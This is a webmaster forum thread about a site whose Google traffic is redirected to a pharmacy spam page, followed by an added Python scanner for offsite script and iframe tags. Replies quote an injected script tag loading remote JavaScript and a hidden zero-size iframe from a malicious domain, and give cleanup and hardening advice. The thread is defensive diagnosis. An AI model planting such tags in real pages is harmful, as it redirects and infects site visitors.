SICK PIECE OF SHIT KEEPS HACKING MY SITE!!!

crossfittn

Afro Blue
Feb 4, 2007
1,135
8
0
TN
topyc.io
OK guys I'm really trying hard to figure this one out but if you go to Google and type Phentermine, then click on the listing for PhenForum.com, he's got it so my site redirects to like... e-topps.info with a pharmacy PPC page. :(

phentermine - Google Search

BUT if I type my URL in directly it doesn't do it. So, he's only stealing my Google traffic.

I've tried uploading my backup .htaccess, backup index.php, etc, but it doesn't work. I tried uploading a plain index.html with some text on it, and that DID stop the redirection. So it seems he's hacked my CMS somehow.

I'm really freaking out right now. Can someone help me? Thank you so much!!!!!!
 


EDIT: Skip to #4 first.

#1 - immediately add an htaccess user/pass to protect your CMS login area.

#2 - log in and change your passwords, make sure you are the only admin set up.

#3 - make sure you don't have an injected javascript bit punched into your index.php (look at the source, near the bottom)

#4 - I found your problem. Someone has posted a javascript link, do you have HTML enabled for posts (a BIG no no)? They are redirecting your traffic via a comment/post:
<.script src="http://e-topps.info/j_pharma.js".>

Delete that post from the database and it will fix, and TURN OFF HTML commenting/posting.
 
WOW Thank you! Where did you find that injected post? I thought I had HTML disabled for posts but I may have missed one usergroup. I just deleted that post in my forum from "Barbarastrac" that said "hi i started today"

It seems to be ok now so that must be the one.

You're great for finding that man. Thank you for putting in the effort to solve the case!!!!!!!!!!!!!!! How the heck can I give you some good rep?
 
I found it by using CTRL+U really quick to look at the source code before it redirected (I just searched the code for "topps"). Definitely go through and make sure HTML posting is turned off for all user groups/commenting, I even turn it off for admin on my forums.

Good luck!
 
Was this in your database or was it on a page? Only I have had some tosser giving me the same sort of trouble. Checking the permissions of your pages can help prevent further, I also changed passwords for the account.

I hope this is the last you see of this parasite ...
 
I still got hassle with this shit. I thought I had gotten rid of the parasite but today I had 6 index pages with
<iframe src='http://fuckingvirusdomain.ru/sta/iframe.php' width='0' height='0' style='visibility: hidden;'></iframe>
(domain changed to protect!)
put onto it. It seems to have only targeted index.php pages so I am guessing something is planted on my server.

I have looked over my server but see nothing. I am going to call someone in, as the server management I have will, I think, brush it aside. On webhostingtalk.com, if you search in this forum for iframe you'll see we are not alone: Technical & Security Issues - WebHostingTalk Forums
Take a look @ this one
Strange code inserted into HTML Pages by WebServer - WebHostingTalk Forums
 

There are various ways for hack/script kiddies to do this. Check my #2 post in this thread to start.

Also, if you are running "stock" scripts like PHPNews, Cutenews or any one of thousands of scripts out there that are open source, make sure they are 100% up to date (even though sometimes that doesn't even help). If you have a combo of an unprotected admin login area, with an outdated News script, etc. then you're ripe for hacking.

Also another culprit could be outdated/unsecured mailing list signup areas/login areas. I personally was a dork and had this happen to me. A punk was accessing through one of those and injecting a javascript bit into the footer of my index page.

What I have started doing recently is not using those open source news scripts etc. as the more something like that is used, the more of a target hackers/script kiddies will consider it. There are even sites out there that, once they hack your page, they post and brag about it.

Revisit my #2 post in this thread, and make sure to do those things. Also, make sure all your scripts are up to date, including any forum installs, etc.
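
Added example, not written by any poster in this thread: a small Python check that automates the "view source and search for the odd domain" step, listing every script or iframe tag that loads from a host outside an allowlist and marking zero-size or hidden iframes like the one quoted above. The host names, the allowlist and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class InjectionFinder(HTMLParser):
    """Collects <script>/<iframe> tags whose src points at a non-allowlisted host."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # tuples of (line, tag, host, hidden)

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}
        try:
            host = (urlparse(a.get("src", "")).hostname or "").lower()
        except ValueError:
            host = "<unparseable src>"  # malformed URL: report it rather than skip it
        if not host or host in self.allowed:
            return  # inline script, same-site relative path, or trusted host
        hidden = (a.get("width") == "0" or a.get("height") == "0"
                  or bool(HIDDEN_STYLE.search(a.get("style", ""))))
        self.findings.append((self.getpos()[0], tag, host, hidden))

def scan(html, allowed_hosts):
    """Return offsite script/iframe findings for one page of HTML source."""
    finder = InjectionFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: a forum page with one injected post and one hidden iframe.
SAMPLE_PAGE = """<html><body>
<script src="/js/forum.js"></script>
<div class="post">hi i started today
<script src="http://injected.example/j.js"></script></div>
<script src="//cdn.forum.example/lib.js"></script>
<iframe src='http://injected.example/sta/iframe.php' width='0' height='0' style='visibility: hidden;'></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, tag, host, hidden in scan(SAMPLE_PAGE, {"cdn.forum.example"}):
        print(f"line {line}: <{tag}> loads from {host}" + (" (hidden)" if hidden else ""))
```

Run it against the HTML the server actually returns to a visitor, since a post stored in the database only shows up in the rendered page and not in index.php on disk.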
 